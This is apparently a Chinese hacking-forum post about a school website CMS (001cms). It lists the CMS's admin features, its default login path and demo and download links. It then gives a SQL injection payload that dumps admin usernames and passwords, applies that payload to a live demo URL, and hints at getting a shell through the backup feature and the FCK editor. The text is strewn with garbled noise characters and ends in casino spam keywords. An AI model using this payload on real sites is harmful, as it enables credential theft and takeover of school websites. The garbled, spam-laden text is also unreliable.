) A" F: Y$ t% y* D% T# Y1.管理员资料:网站的基本信息设置（校长邮箱等）,数据库备份,用户管理、部门及权限管理等
2.学校简介:一级分类，可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
3.文章管理:二级分类,动态添加各相关频道（图片视频频道、学校概况频道除外）文章等信息
" j+ X+ }0 s3 l) \4 g4.视频图片管理:一级分类,动态添加视频或者图片等信息
2 u* x* \! t! f8 t7 n5.留言管理:对留言,修改,删除、回复等管理
6.校友频道:包括校友资料excel导出、管理等功能
" U5 N1 M+ F5 T: a; P% S9 ?8 U2 S7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
  V3 a. R/ T  N) E默认后台:admin/login.asp
官方演示:http://demo.001cms.net
1 d6 U  N. K. V源码下载地址:http://down.chinaz.com/soft/30187.htm
4 Z+ h' @$ `. `' y7 F+ AEXP:
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
getshell:后台有备份，你懂的
8 d) Y  H- s$ _+ `3 d$ l另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
- x1 Y( Y( z- Q" F-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines